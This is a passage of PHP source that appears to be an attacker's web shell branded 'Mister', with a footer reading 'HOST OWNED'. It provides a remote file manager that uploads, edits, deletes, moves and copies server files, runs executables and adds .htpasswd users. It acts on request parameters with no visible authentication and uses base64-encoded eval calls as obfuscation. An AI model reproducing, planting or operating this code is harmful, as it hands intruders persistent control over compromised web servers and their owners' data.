  4280. global $DIRECTORY, $HOMEDIR, $SORT, $REVERSE, $WIN, $COLS, $DATE_FORMAT, $self;
  4281. echo '<tr><th style="width:1%;"></th>';
  4282. $d = 'Mister=FILES&DIR=' . urlencode($DIRECTORY) . '&amp;';
  4283. if (!$REVERSE && $SORT == 'FILENAME') $r = '&amp;reverse=true'; else $r = '';
  4284. echo "\t<th class=\"FILENAME\" style='width:40%;'>&check;
  4285. <a href=\"$self?{$d}sort=FILENAME$r\">" . word('FILENAME') . "</a></th>\n";
  4286. if (!$REVERSE && $SORT == 'size') $r = '&amp;reverse=true'; else $r = '';
  4287. echo "\t<th class=\"size\" style='width:10%;'>&check; <a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n</center>";
  4288. /////// LASTUPDATE
  4289. if (!$WIN) {}
  4290. echo '<th class="LASTUPDATE" style="width:10%;">&check; ' . word('LASTUPDATE') .''; echo"</th>\n";
  4291. /// PERMISSONS
  4292. if (!$WIN) {}
  4293. echo '<th class="PERMISSION" style="width:10%;">&check; ' . word('PERMISSION') .''; echo"</th>\n";
  4294. ///// DAYUPDATE
  4295. if (!$WIN) {}
  4296. echo '<th class="DAYUPDATE" style="width:10%;">&check; ' . word('DAYUPDATE') .''; echo"</th>\n";
  4297. ////// FUNCTIONS
  4298. if (!$WIN) {}
  4299. echo '<th class="FUNCTIONS" style="width:20%;">&check; ' . word('FUNCTIONS') .''; echo"</th>\n";
  4300. ////////    for ($i = 0; $i < sizeof($list); $i++) {
  4301.     for ($i = 0; $i < sizeof($list); $i++) {
  4302.         $FILE = $list[$i];
  4303.         $timestamps  = 'MTIME: ' . date($DATE_FORMAT, $FILE['MTIME']) . ', ';
  4304.         $timestamps .= 'ATIME: ' . date($DATE_FORMAT, $FILE['ATIME']) . ', ';
  4305.         $timestamps .= 'CTIME: ' . date($DATE_FORMAT, $FILE['CTIME']);
  4306. echo '<tr><td class="checkbox"><input type="checkbox" name="CHECKED' . $i . '" value="true" ONFOCUS="activate(\'other\')" />';
  4307. echo '</td><td class="FILENAME" title="' . html($timestamps) . '">';
  4308. if ($FILE['IS_LINK']) {
  4309. echo html($FILE['FILENAME']) . ' &rarr; ';
  4310. $REAL_FILE = RELATIVE2ABSOLUTE($FILE['target'], $DIRECTORY);
  4311. if (@IS_READABLE($REAL_FILE)) {
  4312. if (@IS_DIR($REAL_FILE)) {
  4313. echo '<a href="' . $self . '?Mister=FILES&DIR=' . urlencode($REAL_FILE) . '">' . html($FILE['target']) . '</a>';
  4314. } else {
  4315. echo '<a href="' . $self . '?Mister=FILES&ACTION=EDIT&amp;FILE=' . urlencode($REAL_FILE) . '">' . html($FILE['target']) . '</a>';} } else {
  4316. echo html($FILE['target']);}
  4317. } elseif ($FILE['IS_DIR']) {
  4318. $IMGFOLDERS = '<img src="">'; echo '<b>'; echo ''. $IMGFOLDERS .'</b>';
  4319. if ($WIN || $FILE['IS_EXECUTABLE']) {
  4320. echo '<b><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($FILE['path']) . '">' . html($FILE['FILENAME']) . '</a></b>';} else {
  4321. echo html($FILE['FILENAME']);} } else {
  4322. if (substr($FILE['FILENAME'], 0, 1) == '.') {
  4323. echo ''; }
  4324. else {
  4325. echo ''; }
  4326. if ($FILE['IS_FILE'] && $FILE['IS_READABLE']) {
  4327. $IMGEDITED = '<img src="">'; echo ''. $IMGEDITED .'';
  4328. echo '<a href="' . $self . '?Mister=FILES&ACTION=EDIT&amp;FILE=' . urlencode($FILE['path']) . '">' . html($FILE['FILENAME']) . '</a>';}
  4329. else { echo html($FILE['FILENAME']); } }
  4330. if ($FILE['size'] >= 1000) {
  4331.             $human = ' title="' . human_FILESIZE($FILE['size']) . '"';}
  4332. else {$human = '';}
  4333. echo "\t<td class=\"size\"$human><center>{$FILE['size']} <font style=\"color:#0000F0\">KO</font></td>\n";
  4334. ///// LASTUPDATE
  4335. if (!$WIN) {}
  4336. echo '<td class="LASTUPDATE">';
  4337. echo "<center>";echo  date("d-M-Y H:i",@fileMTIME($FILE['path']));
  4338. //////// PERMISSION
  4339. if (!$WIN) {}
  4340. echo '<td class="PERMISSION">';
  4341. echo "<center>"; echo getFilePermissions($FILE['path']);
  4342. /////// DAYUPDATE
  4343. if (!$WIN) {}
  4344. echo '<td class="DAYUPDATE">';
  4345. echo "<center>";echo  date("l",@fileMTIME($FILE['path']));
  4346. ///// FUNCTIONS
  4347. if (!$WIN) {}
  4348. echo '<td class="FUNCTIONS">';
  4349. echo '<center><input type="hidden" name="FILE' . $i . '" value="' . html($FILE['path']) . '" />';
  4350. /// END
  4351.             $ACTIONS = array();
  4352. if (function_exists('SYMLINK')) {
  4353.             $ACTIONS[] = 'CREATE_SYMLINK';}
  4354. if (@IS_WRITABLE(DIRname($FILE['path']))) {
  4355.             $ACTIONS[] = 'DELETE';
  4356.             $ACTIONS[] = 'RENAME';
  4357.             $ACTIONS[] = 'MOVE';}
  4358. if ($FILE['IS_FILE'] && $FILE['IS_READABLE']) {
  4359.             $ACTIONS[] = 'COPY';
  4360. if ($FILE['IS_WRITABLE'])
  4361.             $ACTIONS[] = 'EDIT';
  4362.             $ACTIONS[] = 'DOWNLOAD';
  4363.             }
  4364. if (!$WIN && function_exists('exec') && $FILE['IS_FILE'] && $FILE['IS_EXECUTABLE'] && FILE_EXISTS('/bin/sh')) {
  4365.             $ACTIONS[] = 'EXECUTE';}
  4366. if (sizeof($ACTIONS) > 0) {
  4367. echo '<select name="ACTION' . $i . '">
  4368. <option value="">' . str_repeat('&nbsp;', 30) . '</option>';
  4369. foreach ($ACTIONS as $ACTION) {
  4370. echo "\t\t<option value=\"$ACTION\">" . word($ACTION) . "</option>\n";}
  4371. echo '</select><input class="Mister-button" type="submit" name="submit' . $i . '" value=" DONE " ONFOCUS="activate(\'other\')" />';}
  4372. echo '</td></tr>';}
  4373. echo '<tr></td><td colspan="' . ($COLS - 1) . '">';
  4374. echo '<input type="hidden" name="num" value="' . sizeof($list) . '" />';
  4375. echo '<input type="hidden" name="FOCUS" value="" />';
  4376. echo '<input type="hidden" name="OLDDIR" value="' . html($DIRECTORY) . '" /> <b> &check; FUNCTIONS FOR ALL : </b>';
  4377.              $ACTIONS = array();
  4378. if (@IS_WRITABLE(DIRname($FILE['path']))) {
  4379.              $ACTIONS[] = 'DELETE';
  4380.              $ACTIONS[] = 'MOVE';}
  4381.              $ACTIONS[] = 'COPY';
  4382. echo '<select name="ACTION_ALL">
  4383. <option value="">' . str_repeat('&nbsp;', 30) . '</option>';
  4384. foreach ($ACTIONS as $ACTION) {
  4385. echo "\t\t<option value=\"$ACTION\">" . word($ACTION) . "</option>\n";}
  4386. echo '</select><input class="Mister-button" type="submit" name="SUBMIT_ALL" value=" DONE " ONFOCUS="activate(\'other\')" />';
  4387. $MISTER23 = "</td></tr>"; echo ''. $MISTER23 .''; }
  4388. ///////////// EDITE
  4389. function EDIT ($FILE) {
  4390. global $self, $DIRECTORY, $editcols, $editrows, $APACHE, $HTPASSWD, $htaccess;
  4391.     HTML_HEADER();
  4392. echo'<h2 style="text-align: left; margin-bottom: 0"><b>'; eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/")); echo'<span style="color:#FFFFFF;"> CREAT & EDITE FILE : </b></span>'; echo'<center><input style="width:99%;" type="text"  value="' . html ($FILE) . '"></center>';  eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/")); echo'</b><span style="color:#FFFFFF;">LASTE UPDATE : </b><span> | '; echo  date("l",@fileMTIME($FILE)); echo' | '; echo  date("d-M-Y H:i",@fileMTIME($FILE)); echo'</h2>';
  4393. ////////////// $HTPASSWD
  4394. echo'<form action="' . $self . '?Mister=FILES" method="post">';
  4395. echo'<table class="dialog" >';
  4396. echo'<center><textarea style="width:99%;height:40%;"  name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
  4397. if (array_key_exists('content', $_POST)) {
  4398. echo $_POST['content'];} else {
  4399. $f = fopen($FILE, 'r');
  4400. while (!feof($f)) {
  4401. echo html(fread($f, 8192));}
  4402. fclose($f);}
  4403. if (!empty($_POST['user'])) {
  4404. echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);}
  4405. if (!empty($_POST['basic_auth'])) {
  4406. if ($WIN) { $AUTHFILE = str_replace('\\', '/', $DIRECTORY) . $HTPASSWD; }
  4407. else { $AUTHFILE = $DIRECTORY . $HTPASSWD;}
  4408. echo "\nAuthType Basic\nAuthName &quot;Restricted DIRECTORY&quot;\n";
  4409. echo 'AuthUserFILE &quot;' . html($AUTHFILE) . "&quot;\n";
  4410. echo 'Require valid-user';}
  4411. echo '</textarea></center>';
  4412. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|';
  4413. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4414. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4415. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4416. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4417. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4418. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4419. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4420. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4421. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4422. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4423. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4424. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4425. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4426. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4427. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4428. echo ''. $REPORTERROR .'</a></span></footer>';
  4429. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4430. if ($APACHE && basename($FILE) == $HTPASSWD) {
  4431. echo '' . word('user') . ': <input type="text" name="user" />';
  4432. echo '' . word('password') . ': <input type="password" name="password" />';
  4433. echo '<input type="submit" value="' . word('add') . '" />';}
  4434. if ($APACHE && basename($FILE) == $htaccess) {
  4435. echo '<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />';}
  4436. echo '<input type="hidden" name="ACTION" value="EDIT" />';
  4437. echo '<input type="hidden" name="FILE" value="' . html($FILE) . '" />';
  4438. echo '<input type="hidden" name="DIR" value="' . html($DIRECTORY) . '" />';
  4439. echo '<input type="RESET" value="' . word('RESET') . '" class="Mister-button"/>';
  4440. echo '<input type="submit" name="SAVE" value="' . word('SAVE') . '" " style="margin-left:50px" class="Mister-button"/>';
  4441. echo '<a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '" style="margin-left:50px">[ ' . word('BACK') . ' ]</a>';
  4442. $MISTERKLIO22 = "</td></tr></table></form><br>";    echo ''. $MISTERKLIO22 .'';
  4443.     HTML_FOOTER(); }
  4444. function spacer () {
  4445. global $COLS;}
  4446. function textfieldsize ($content) {
  4447. $size = strlen($content) + 5;
  4448. if ($size < 30) $size = 30;
  4449. return $size;}
  4450. function REQUEST_DUMP () {
  4451. foreach ($_REQUEST as $key => $value) {
  4452. echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
  4453. }
  4454. }
  4455. function html ($string) {
  4456. global $charset;
  4457. return htmlentities($string, ENT_COMPAT, $charset);}
  4458. function word ($word) {
  4459. global $words, $WORD_CHARSET;
  4460. return htmlentities($words[$word], ENT_COMPAT, $WORD_CHARSET);}
  4461. function phrase ($phrase, $arguments) {
  4462. global $words;
  4463. static $search;
  4464. if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
  4465. for ($i = 0; $i < sizeof($arguments); $i++) {
  4466. $arguments[$i] = nl2br(html($arguments[$i]));}
  4467. $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
  4468. return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));}
  4469. function getwords ($lang) {
  4470. global $WORD_CHARSET, $DATE_FORMAT;
  4471. switch ($lang) {
  4472. case 'en':
  4473.     default:
  4474.         $DATE_FORMAT = 'n/j/y H:i:s';
  4475.         $WORD_CHARSET = 'ISO-8859-1';
  4476. return array (
  4477. 'DOWNLOAD' => 'DOWNLOAD','CREATE_SYMLINK' => 'CREATE_SYMLINK','SYMLINK' => 'SYMLINK',
  4478. 'IS_WRITABLE' => 'IS_WRITABLE','NOT_READABLE' => 'NOT READABLE YOU DONT HAVE PERMISSION TO ACCES HERE',
  4479. 'IS_EXECUTABLE' => 'IS_EXECUTABLE','IS_FILE' => 'IS_FILE','DAYUPDATE' => 'DAYUPDATE','PERMISSION' => 'PERMISSION',
  4480. 'LASTUPDATE' => 'LASTUPDATE','DIRECTORY' => 'DIRECTORY','FILE' => 'FILE',
  4481. 'FILENAME' => 'FILENAME','size' => 'SIZE','FUNCTIONS' => 'FUNCTIONS',
  4482. 'EXECUTE' => 'EXECUTE','DELETE' => 'DELETE','RENAME' => 'RENAME',
  4483. 'MOVE' => 'MOVE','COPY' => 'COPY','EDIT' => 'EDIT','DOWNLOAD' => 'DOWNLOAD',
  4484. 'UPLOAD' => 'UPLOAD','CREATE' => 'CREATE','CHANGE' => 'CHANGE','SAVE' => 'SAVE',
  4485. 'SET' => 'SET','RESET' => 'RESET','YES' => 'YES','NO' => 'NO',
  4486. 'BACK' => 'BACK','DESTINATION' => 'DESTINATION','NO_OUTPUT' => 'NO OUTPUT',
  4487. 'UPLOADED' => '"[%1]" HAS BEEN UPLOADED.','NOT_UPLOADED' => '"[%1]" COULD NOT BE UPLOADED.',
  4488. 'ALREADY_EXISTS' => '"[%1]" ALREADY EXISTS.','CREATED' => '"[%1]" HAS BEEN CREATED.',
  4489. 'NOT_CREATED' => '"[%1]" COULD NOT BE CREATED.','REALLY_DELETE' => 'DELETE THESE FILES?',
  4490. 'DELETED' => "THESE FILES HAVE BEEN DELETED:\n[%1]",'NOT_DELETED' => "THESE FILES COULD NOT BE DELETED:\n[%1]",
  4491. 'RENAME_FILE' => 'RENAME FILE TO ? :','RENAMED' => '"[%1]" HAS BEEN RENAMED TO "[%2]".',
  4492. 'NOT_RENAMED' => '"[%1] COULD NOT BE RENAMED TO "[%2]".','MOVE_FILES' => 'MOVE THESE FILES :',
  4493. 'MOVED' => "THESE FILES HAVE BEEN MOVED TO \"[%2]\":\n[%1]",
  4494. 'NOT_MOVED' => "THESE FILES COULD NOT BE MOVED TO \"[%2]\":\n[%1]",
  4495. 'COPY_FILES' => 'COPY THESE FILES :','COPIED' => "THESE FILES HAVE BEEN COPIED TO \"[%2]\":\n[%1]",
  4496. 'NOT_COPIED' => "THESE FILES COULD NOT BE COPIED TO \"[%2]\":\n[%1]",
  4497. 'NOT_EDITED' => '"[%1]" CAN NOT BE EDITED.','SAVED' => '"[%1]" HAS BEEN SAVED.',
  4498. 'NOT_SAVED' => '"[%1]" COULD NOT BE SAVED.',
  4499. 'ZIP' => 'ZIP.',
  4500. 'CHMOD' => 'CHMOD.',
  4501.         );
  4502.     }
  4503. }
  4504. function getimage ($image) {}
  4505. function HTML_HEADER () {}
  4506. function HTML_FOOTER () {
  4507. echo '</span>'; echo ''. $THEEND .'';}
  4508. function NOTICE ($phrase) {
  4509. global $COLS; $args = func_get_args();
  4510. array_shift($args);
  4511. return '<th style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '">'. phrase($phrase, $args) . '</td>';}
  4512. function error ($phrase) {
  4513. global $COLS; $args = func_get_args();
  4514. array_shift($args);
  4515. return '<th style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '">' . phrase($phrase, $args) . '</td></tr>';}
  4516. ////  $HOMEDIR = BACK './';
  4517. $HOMEDIR = './';
  4518. if (get_magic_quotes_gpc()) {
  4519.     array_walk($_GET, 'STRIP');
  4520.     array_walk($_POST, 'STRIP');
  4521.     array_walk($_REQUEST, 'STRIP');}
  4522. if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif');
  4523.     die(getimage($_GET['image']));}
  4524. $delim = DIRECTORY_SEPARATOR;
  4525. if (function_exists('php_uname')) {
  4526.     $WIN = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;} else {
  4527.     $WIN = ($delim == '\\') ? true : false;}
  4528. if (!empty($_SERVER['PATH_TRANSLATED'])) {
  4529.     $SCRIPTDIR = DIRname($_SERVER['PATH_TRANSLATED']);
  4530. } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
  4531.     $SCRIPTDIR = DIRname($_SERVER['SCRIPT_FILENAME']);
  4532. } elseif (function_exists('getcwd')) {
  4533.     $SCRIPTDIR = getcwd();
  4534. } else {
  4535.     $SCRIPTDIR = '.';}
  4536. $HOMEDIR = RELATIVE2ABSOLUTE($HOMEDIR, $SCRIPTDIR);
  4537. $DIR = (array_key_exists('DIR', $_REQUEST)) ? $_REQUEST['DIR'] : $HOMEDIR;
  4538.  
  4539. if (array_key_exists('OLDDIR', $_POST) && !path_is_relative($_POST['OLDDIR'])) {
  4540.     $DIR = RELATIVE2ABSOLUTE($DIR, $_POST['OLDDIR']);}
  4541. $DIRECTORY = simplify_path(addslash($DIR));
  4542. $FILES = array();
  4543. $ACTION = '';
  4544. if (!empty($_POST['SUBMIT_ALL'])) {
  4545.     $ACTION = $_POST['ACTION_ALL'];
  4546.     for ($i = 0; $i < $_POST['num']; $i++) {
  4547. if (array_key_exists("CHECKED$i", $_POST) && $_POST["CHECKED$i"] == 'true') {
  4548.             $FILES[] = $_POST["FILE$i"];
  4549.         }
  4550.     }
  4551. } elseif (!empty($_REQUEST['ACTION'])) {
  4552.     $ACTION = $_REQUEST['ACTION'];
  4553.     $FILES[] = RELATIVE2ABSOLUTE($_REQUEST['FILE'], $DIRECTORY);
  4554. } elseif (!empty($_POST['SUBMIT_UPLOAD']) && !empty($_FILES['UPLOAD']['name'])) {
  4555.     $FILES[] = $_FILES['UPLOAD'];
  4556.     $ACTION = 'UPLOAD';
  4557. } elseif (array_key_exists('num', $_POST)) {
  4558.     for ($i = 0; $i < $_POST['num']; $i++) {
  4559.         if (array_key_exists("submit$i", $_POST)) break;}
  4560. if ($i < $_POST['num']) {
  4561.         $ACTION = $_POST["ACTION$i"];
  4562.         $FILES[] = $_POST["FILE$i"];}}
  4563. if (empty($ACTION) && (!empty($_POST['SUBMIT_CREATE']) || (array_key_exists('FOCUS', $_POST) && $_POST['FOCUS'] == 'CREATE')) && !empty($_POST['CREATE_NAME'])) {
  4564.     $FILES[] = RELATIVE2ABSOLUTE($_POST['CREATE_NAME'], $DIRECTORY);
  4565.     switch ($_POST['CREATE_type']) {
  4566.     case 'DIRECTORY':
  4567.         $ACTION = 'CREATE_DIRECTORY';
  4568.         break;
  4569. /////// FILE
  4570. case 'FILE':
  4571.         $ACTION = 'CREATE_FILE';}}
  4572. if (sizeof($FILES) == 0) $ACTION = ''; else $FILE = RESET($FILES);
  4573. if ($lang == 'AUTO') {
  4574. if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
  4575.         $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);} else {
  4576.         $lang = 'EN';}}
  4577. $words = getwords($lang);
  4578. $COLS = ($WIN) ? 4 : 7;
  4579. if (!isset($DIRPERMISSION)) {
  4580.     $DIRPERMISSION = (function_exists('umask')) ? (0777 & ~umask()) : 0755;}
  4581. if (!isSET($FILEPERMISSION)) {
  4582.     $FILEPERMISSION = (function_exists('umask')) ? (0666 & ~umask()) : 0644;}
  4583. if (!empty($_SERVER['SCRIPT_NAME'])) {
  4584.     $self = html(basename($_SERVER['SCRIPT_NAME']));
  4585. } elseif (!empty($_SERVER['PHP_SELF'])) {
  4586.     $self = html(basename($_SERVER['PHP_SELF']));} else {
  4587.     $self = '';}
  4588. if (!empty($_SERVER['SERVER_SOFTWARE'])) {
  4589. if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'APACHE') {
  4590.         $APACHE = true;} else {
  4591.         $APACHE = false;}} else {
  4592.     $APACHE = true;}
  4593. switch ($ACTION) {
  4594. ///////////  UPLOAD
  4595. case 'UPLOAD':
  4596.     $DEST = RELATIVE2ABSOLUTE($FILE['name'], $DIRECTORY);
  4597. if (@FILE_EXISTS($DEST)) {
  4598.         LISTING_PAGE(error('ALREADY_EXISTS', $DEST));}
  4599. elseif (@MOVE_UPLOADED_FILE($FILE['tmp_name'], $DEST)) {
  4600.         LISTING_PAGE(NOTICE('UPLOADED', $FILE['name']));} else {
  4601.         LISTING_PAGE(error('NOT_UPLOADED', $FILE['name']));}
  4602.     break;
  4603. case 'CREATE_DIRECTORY':
  4604. if (@FILE_EXISTS($FILE)) {
  4605.         LISTING_PAGE(error('ALREADY_EXISTS', $FILE));} else {
  4606.         $MKOLD = @umask(0777 & ~$DIRPERMISSION);
  4607. if (@mkDIR($FILE, $DIRPERMISSION)) {
  4608.             LISTING_PAGE(NOTICE('CREATED', $FILE));} else {
  4609.             LISTING_PAGE(error('NOT_CREATED', $FILE));}
  4610.         @umask($MKOLD);}
  4611. break;
  4612. ///////// CREATE FILE
  4613. case 'CREATE_FILE':
  4614. if (@FILE_EXISTS($FILE)) {
  4615.         LISTING_PAGE(error('ALREADY_EXISTS', $FILE));} else {
  4616.         $MKOLD = @umask(0777 & ~$FILEPERMISSION);
  4617. if (@touch($FILE)) {
  4618.             EDIT($FILE);} else {
  4619.             LISTING_PAGE(error('NOT_CREATED', $FILE));}
  4620.         @umask($MKOLD);}
  4621.     break;
  4622. ////////// DELET
  4623. case 'DELETE':
  4624. if (!empty($_POST['NO'])) {
  4625.         LISTING_PAGE();} elseif (!empty($_POST['YES'])) {
  4626.         $FAILURE = array();
  4627.         $SUCCESS = array();
  4628.         foreach ($FILES as $FILE) {
  4629. if (del($FILE)) {
  4630.                 $SUCCESS[] = $FILE;} else {
  4631.                 $FAILURE[] = $FILE;}}
  4632.         $MESSAGE = '';
  4633. if (sizeof($FAILURE) > 0) {
  4634.             $MESSAGE = error('NOT_DELETED', implode("\n", $FAILURE));}
  4635. if (sizeof($SUCCESS) > 0) {
  4636.             $MESSAGE .= NOTICE('DELETED', implode("\n", $SUCCESS));}
  4637.         LISTING_PAGE($MESSAGE);} else {
  4638.         HTML_HEADER();
  4639. echo '<form action="' . $self . '?Mister=FILES" method="post" style="background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;">';
  4640. $MISTERKLIO11 = "<br><table class='dialog'><tr><td><center>"; echo ''. $MISTERKLIO11 .'' ;
  4641.         REQUEST_DUMP();
  4642. echo "\t<b>" . word('REALLY_DELETE') . '</b><p>';
  4643. foreach ($FILES as $FILE) {
  4644. echo "\t" . html($FILE) . "<br>\n";}
  4645. $MISTERKLIO10 = "</p><br>"; echo ''. $MISTERKLIO10 .'' ;
  4646. echo '<input type="submit" class="Mister-button" name="NO" value="' . word('NO') . '" >';
  4647. echo '<input type="submit" class="Mister-button" name="YES" value="' . word('YES') . '" " style="margin-left: 50px" />';
  4648. $MISTERKLIO9 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO9 .'' ;
  4649.         HTML_FOOTER(); }
  4650.     break;
  4651. ////////// RENAME
  4652. case 'RENAME':
  4653. if (!empty($_POST['DESTINATION'])) {
  4654.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4655. if (!@FILE_EXISTS($DEST) && @RENAME($FILE, $DEST)) {
  4656.             LISTING_PAGE(NOTICE('RENAMED', $FILE, $DEST));} else {
  4657.             LISTING_PAGE(error('NOT_RENAMED', $FILE, $DEST));}} else {
  4658.   $name = basename($FILE);
  4659.         HTML_HEADER();
  4660. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4661. $MISTERKLIO7 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>"; echo ''. $MISTERKLIO7 .'' ;
  4662. $MISTERKLIO8 = '<input type="hidden" name="action" value="RENAME">'; echo ''. $MISTERKLIO8 .'' ;
  4663. echo '<input type="hidden" name="FILE" value="' . html($FILE) . '">';
  4664. echo '<input type="hidden" name="DIR" value="' . html($DIRECTORY) . '">';
  4665. echo '<b>' . word('RENAME_FILE') . '</b>';
  4666. echo '<p><b><span Style="color:#FFFFFF;">';  $ORIGINALEFILE = " ORIGINALE FILE : <br>";
  4667. echo ''. $ORIGINALEFILE .'</span></b>' . html($FILE) . '</p>' ; $RENAMETO = " RENAME TO : ";
  4668. echo '<b><span Style="color:#FFFFFF;">'; echo ''. $RENAMETO .'</span></b>' ;
  4669. echo '<input type="text" style="width:99%;color:#0000F0;background:-webkit-linear-gradient(top, #000000 0, #404040 100%) no-repeat; " name="DESTINATION" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
  4670. <input type="submit" class="Mister-button" value="' . word('RENAME') . '" /><p></p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]';
  4671. $MISTERKLIO6 = "</a><br><br></td></tr></table></form>";
  4672. echo ''. $MISTERKLIO6 .'' ;
  4673. HTML_FOOTER(); }
  4674.     break;
  4675. ///////// MOVE FILE
  4676. case 'MOVE':
  4677. if (!empty($_POST['DESTINATION'])) {
  4678.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4679.         $FAILURE = array();
  4680.         $SUCCESS = array();
  4681. foreach ($FILES as $FILE) {
  4682.             $FILENAME = substr($FILE, strlen($DIRECTORY));
  4683.             $d = $DEST . $FILENAME;
  4684. if (!@FILE_EXISTS($d) && @RENAME($FILE, $d)) {
  4685.                 $SUCCESS[] = $FILE;} else {
  4686.                 $FAILURE[] = $FILE;}}
  4687.         $MESSAGE = '';
  4688. if (sizeof($FAILURE) > 0) {
  4689.             $MESSAGE = error('NOT_MOVED', implode("\n", $FAILURE), $DEST);}
  4690. if (sizeof($SUCCESS) > 0) {
  4691.             $MESSAGE .= NOTICE('MOVED', implode("\n", $SUCCESS), $DEST);}
  4692.         LISTING_PAGE($MESSAGE);} else {
  4693.         HTML_HEADER();
  4694. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4695. $MISTERKLIO5 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>" ;
  4696. echo ''. $MISTERKLIO5 .'' ;
  4697.         REQUEST_DUMP();
  4698. echo "\t<b>" . word('MOVE_FILES') . '</b><p>';
  4699. foreach ($FILES as $FILE) {
  4700. echo "\t" . html($FILE) . "<br />\n"; }
  4701. echo '</p>' . word('DESTINATION') . ':';
  4702. echo '<input type="text" name="DESTINATION" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" />';
  4703. echo '<br><br><input type="submit" class="Mister-button" value="' . word('MOVE') . '" /><p>';
  4704. echo '</p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]</a>';
  4705. $MISTERKLIO4 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO4 .'' ;
  4706. HTML_FOOTER();}
  4707. break;
  4708. /////////  COPY
  4709. case 'COPY':
  4710. if (!empty($_POST['DESTINATION'])) {
  4711.         $DEST = RELATIVE2ABSOLUTE($_POST['DESTINATION'], $DIRECTORY);
  4712. if (@IS_DIR($DEST)) {
  4713.             $FAILURE = array();
  4714.             $SUCCESS = array();
  4715. foreach ($FILES as $FILE) {
  4716.                 $FILENAME = substr($FILE, strlen($DIRECTORY));
  4717.                 $MKDESET = addslash($DEST) . $FILENAME;
  4718. if (!@IS_DIR($FILE) && !@FILE_EXISTS($MKDESET) && @COPY($FILE, $MKDESET)) {
  4719.                     $SUCCESS[] = $FILE;} else {
  4720.                     $FAILURE[] = $FILE;}}
  4721.             $MESSAGE = '';
